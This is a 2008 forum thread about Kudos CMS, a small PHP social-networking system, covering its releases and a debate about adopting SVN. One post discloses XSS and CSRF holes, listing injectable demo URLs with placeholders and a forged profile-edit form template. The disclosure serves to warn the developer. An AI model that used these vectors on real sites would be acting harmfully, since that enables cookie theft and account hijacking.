 |
Account Login
|
 |
 |
Latest Articles
|
 |
 |
Advertisement
|
 |
 |
Associates
|
 |
 |
Associates
|
 |
|
 |
|
 |
|
 |
01-24-2008, 10:28 PM
|
#1 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
Kudos CMS
This is a CMS (Content Management System) I have been working on for a long time. It is sort of like a Social Networking script
but for a small group of people, like a youth group, club, or family.
Check it out for yourself to get a better feel for how it works.
> Official Site
> Live Demo
As for now members can...
- Post comments for other members to see on the Bulletin Board
- Every user has his or her very own wall that they or other members can post on.
- Members can upload photos and create photo album pages.
- Members can't post Announcements (you can turn this on from the admin panel)
It is template driven and has many features like smilies and post formatting. Please tell me what you think.
Please register and post on the forum to give it a little kick start. 
> Kudos Support Forums
__________________
There is no place like 127.0.0.1
|
|
|
|
|
The Following User Says Thank You to ETbyrne For This Useful Post:
|
|
01-24-2008, 10:57 PM
|
#2 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: morocco
Posts: 176
Thanks: 19
|
really nice i like it
but add more plugins
__________________
|
|
|
|
The Following User Says Thank You to webtuto For This Useful Post:
|
|
01-24-2008, 11:35 PM
|
#3 (permalink)
|
|
The Addict
Join Date: Nov 2007
Posts: 265
Thanks: 2
|
Can we have a user/pass to admin area to check out the backend?
|
|
|
|
01-25-2008, 01:31 AM
|
#4 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
Nope, sorry can't let anyone demo the admin panel, but I can tell you that it is very easy to use and doesn't have a bunch of pointless settings like a lot of CMS's.
Maybe I'll post a screen shot...
__________________
There is no place like 127.0.0.1
|
|
|
|
01-25-2008, 01:21 PM
|
#5 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
__________________
There is no place like 127.0.0.1
|
|
|
|
01-27-2008, 01:46 PM
|
#6 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
I just released the Kudos version 0.6 and it supports custom plug-ins! :D
Download version 0.6:
> http://www.evanbot.com/kudos/bin/kudos-v0-6.zip
Patch for version 0.5 users:
> http://www.evanbot.com/kudos/bin/patch-v0-6.zip
I'll make a short "hello world" plug-in tutorial soon and show you all how easy it is to make a plug-in. And to install plug-ins is really easy, just upload the folder and it works!
__________________
There is no place like 127.0.0.1
|
|
|
|
02-21-2008, 06:18 AM
|
#7 (permalink)
|
|
The Wanderer
Join Date: Feb 2008
Location: Kingston Upon Hull
Posts: 10
Thanks: 8
|
Looks Nice
It looks nice and simple. Very clean and crisp.
Do you have plans to make the project into something like Joomla with a file repository? 
|
|
|
|
03-19-2008, 03:32 PM
|
#8 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
I just released version 0.7, you should give it a try. 
> Kudos Content Management System (CMS)
@richardm: I don't have any plans to add a file repository to Kudos, but it could be easily added on as a Plug-in.
__________________
There is no place like 127.0.0.1
|
|
|
|
03-19-2008, 05:38 PM
|
#9 (permalink)
|
|
The Frequenter
Join Date: Sep 2007
Posts: 350
Thanks: 24
|
As a open-source developer, it will be really easy to maintain your code if you use version controlling system. I recommend SVN.
__________________
Necessity is the mother of invention.
My blog
|
|
|
|
03-20-2008, 04:26 PM
|
#10 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
There's no point to add a fancy version control system, updating is as easy as uploading files. Why complicate it?
__________________
There is no place like 127.0.0.1
|
|
|
|
03-20-2008, 05:05 PM
|
#11 (permalink)
|
|
The Frequenter
Join Date: Sep 2007
Posts: 350
Thanks: 24
|
Quote:
Originally Posted by ETbyrne
There's no point to add a fancy version control system, updating is as easy as uploading files. Why complicate it?
|
You're under-estimating the power of version controlling system. You'll regret your decision when CMS might grow from 78 files to 586 files. VCS is not equal to uploading files.
__________________
Necessity is the mother of invention.
My blog
|
|
|
|
03-21-2008, 02:59 AM
|
#12 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
So, what are the advantages of using SVN? I still have no clue what SVN even does. From the SVN home page it looks like just something for managing files and folders. It also sounds a little on the heavy side, something that Kudos is aimed at not being. Plus it's all binary and has OS specific releases, that means my users would have to have to be on a certain OS to run my CMS and - correct me if I'm wrong - you would have to have direct access to the server to install it.
__________________
There is no place like 127.0.0.1
|
|
|
|
04-06-2008, 02:14 PM
|
#13 (permalink)
|
|
The Frequenter
Join Date: Oct 2007
Location: Manchester, UK
Posts: 371
Thanks: 20
|
been using CVS at work for ages (were just switiching to SVN atm)
it allows you to roll back changes if they go tits up and also its helpful if you have more than one developer working there are more benifits aswell.
__________________
|
|
|
|
04-06-2008, 05:01 PM
|
#14 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
Sounds like it would be a good idea for a group of developers to use locally...
__________________
There is no place like 127.0.0.1
|
|
|
|
04-12-2008, 04:28 PM
|
#15 (permalink)
|
|
The Wanderer
Join Date: Feb 2008
Posts: 8
Thanks: 9
|
Heya man ur scripts have Multiple Cross-Site Scripting Vulnerabilities
PHP Code:
------------------- XSS ---------------------
http://www.evanbot.com/kudos/demo/?page=edit_profile_photo&id=[XSS]
http://www.evanbot.com/kudos/demo/?page=search&keywords=[XSS]
http://www.evanbot.com/kudos/demo/?page=edit_profile&id=username[XSRF]
http://www.evanbot.com/kudos/demo/?page=user&id=[XSS]
http://www.evanbot.com/kudos/demo/?page=album&id=[XSS]
http://www.evanbot.com/kudos/demo/?page=post_wall&id=[XSS]
------------------- XSRF ---------------------
<form method='post' action='scripts.php?page=edit_profile&id=username'>
<textarea cols='65' rows='17' name='profile'>[XSRF]</textarea></p>
<input name='email' value='mail@site.com' /></p>
<input type='submit' value='Save' /></form>
The disclosure of these issues has been credited to autehonker of the / Depo2 BugTracker/ReverseEnginnering/Cryptology Development Center | Depo2.Nm.Ru |
Enjoy!
|
|
|
|
04-15-2008, 03:30 PM
|
#16 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
I'm not quite sure what you are saying here... More info on what this means?
__________________
There is no place like 127.0.0.1
|
|
|
|
04-16-2008, 08:11 PM
|
#19 (permalink)
|
|
The Acquainted
Join Date: Feb 2008
Posts: 119
Thanks: 17
|
Quote:
Originally Posted by ETbyrne
|
Using xss vulnerability someone could steel your cookies, possibly getting access to victim's account.
Another thing that can be done, is a popup window, that will show attackers page, or even a redirect :S
|
|
|
|
04-17-2008, 03:33 PM
|
#20 (permalink)
|
|
The Acquainted
Join Date: Dec 2007
Location: Lapeer, MI
Posts: 136
Thanks: 27
|
These are just disc space wasters. I will release a patch when I get back from my comp this weekend.
__________________
There is no place like 127.0.0.1
|
|
|
|
|
Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
|
|
|
| Thread Tools |
|
|
| Display Modes |
Linear Mode
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
|